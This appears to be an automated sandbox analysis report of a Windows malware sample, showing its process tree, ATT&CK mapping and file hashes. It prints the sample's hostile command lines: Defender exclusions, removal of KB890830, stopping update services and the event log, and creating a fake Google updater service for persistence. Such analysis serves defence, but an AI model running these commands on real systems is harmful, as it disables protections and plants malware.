- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:6164 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release4⤵
- System Location Discovery: System Language Discovery
PID:5632 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release5⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:3692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew4⤵
- System Location Discovery: System Language Discovery
PID:1784 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew5⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:5136
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5396 -
C:\Users\Admin\AppData\Local\Temp\fvkoke.exe"C:\Users\Admin\AppData\Local\Temp\fvkoke.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6680 -
C:\Users\Admin\AppData\Local\Temp\tmp1311.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp1311.tmp.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release5⤵
- System Location Discovery: System Language Discovery
PID:1948 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release6⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:3588
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew5⤵
- System Location Discovery: System Language Discovery
PID:8020 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew6⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:7976
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ohrpqf.exe"C:\Users\Admin\AppData\Local\Temp\ohrpqf.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3664 -
C:\Users\Admin\AppData\Local\Temp\tmp136F.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp136F.tmp.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://trashycontinuousbubbly.com/wkhy5rzh2v?key=8f87e6d0bc0d653ad051bd077c8dd5ad"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8176 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://trashycontinuousbubbly.com/wkhy5rzh2v?key=8f87e6d0bc0d653ad051bd077c8dd5ad6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6392 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa6dc546f8,0x7ffa6dc54708,0x7ffa6dc547187⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:27⤵PID:3276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:5460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:87⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:17⤵PID:2052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:17⤵PID:5276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:87⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:7108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:17⤵PID:7056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:17⤵PID:7076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:17⤵PID:6900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,18109911928299348098,14802909718697389690,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:17⤵PID:6880
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wdeffp.exe"C:\Users\Admin\AppData\Local\Temp\wdeffp.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:7816 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:7088
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4164
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:3464
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:5520
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:5768
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:7204
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3160 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2296
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:7360
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5448 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:7380
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5860 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:7272
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:7400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:7428 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:7356
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:7460
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:7764
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:3476 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:7792
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 17163⤵
- Program crash
PID:5488
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
PID:7848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4464
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3656
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4000
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1104
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3640
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:776
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2160
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2808
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1832
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
PID:3736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5024 -ip 50242⤵PID:2644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5024 -ip 50242⤵PID:3196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4584 -ip 45842⤵PID:5296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5396 -ip 53962⤵PID:6176
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:5036
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:5784
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6788
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6748
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:6628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:5300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:6860
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:8056 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:7832 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:8140
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6368
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:8144
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4220
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:6724
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2960 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5696
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1688
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6608 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6732
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6600
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6020
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6580 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4816
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6416
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:720
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:6588 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7384
-
-
-
C:\ProgramData\Google\Chrome\updater.exe"C:\ProgramData\Google\Chrome\updater.exe"3⤵PID:7492
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:7668
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:7568
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:7004
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:7656
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:7972
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:6300
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:7032
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:8052
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:7652
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:7824
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:7964
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:7844
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:7832
-
-
C:\Windows\system32\dialer.exedialer.exe4⤵PID:8152
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:7828
-
-
C:\ProgramData\Google\Chrome\updater.exe"C:\ProgramData\Google\Chrome\updater.exe"3⤵PID:7612
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:8120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:8172
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:8076
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:5392
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:6444
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:7512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3132
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:7216
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:7208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:7840
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:8004
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:2256
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:7088
-
-
C:\Windows\system32\dialer.exedialer.exe4⤵PID:4088
-
-
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6956
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Power Settings
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Defense Evasion
Impair Defenses
3Disable or Modify Tools
2Indicator Removal
1Clear Windows Event Logs
1Modify Registry
3Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58a78aea56680b078b5e6d246783327f6
SHA1f63040b47b394e7d2ad0793e96b014f155977ae6
SHA256f66f55bc37120357851e0169eb35de7fc6f54dbcadc9a5577c1d7b8c9923710a
SHA512804113c418e71d47155bcebbd8c4e9fee3fab54f861660c28484af66655c761f1faadf7b45eb8a52c3255c56a79dfcfa7fa397951e72936787c7262630ad3791
-
Filesize
152B
MD5c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA14d16a7e82190f8490a00008bd53d85fb92e379b0
SHA2561e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd
-
Filesize
152B
MD5e55832d7cd7e868a2c087c4c73678018
SHA1ed7a2f6d6437e907218ffba9128802eaf414a0eb
SHA256a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574
SHA512897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f
-
Filesize
5KB
MD5086ba007387938db400ec5b938a747dd
SHA18f0f5f814ba91a43c80f5c2a94d3bbeb1fcb2cce
SHA2568ad8281d9fbaf746db4906740b85db7befa0a364d3a5245fce9e202310436aad
SHA5120ac952641a840ad792f9ebf09d35ef8ccf0a768c0338853737893aaea2bb4ad5dff2c42d447d75a16fbe511128c602b6da954b51ef926151d28af692f95c5c87
-
Filesize
6KB
MD5513038a077eaf8f533d1dc0d3b8c15b2
SHA111efd84a84f79fd775f7a0d528b551fbfb4cffcd
SHA256355981e63b5d7af492ae071306513b0825f0d826225538568da15dc2f4c8456d
SHA5126b7dd6a938d5ddcb61f1a62bde388016521df4723dae15bf4df8425565a76f18d8398b8fccf9696042fcc058ea4a5313e94e41ecf32cbbfbaad81e4a8fc2f134
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
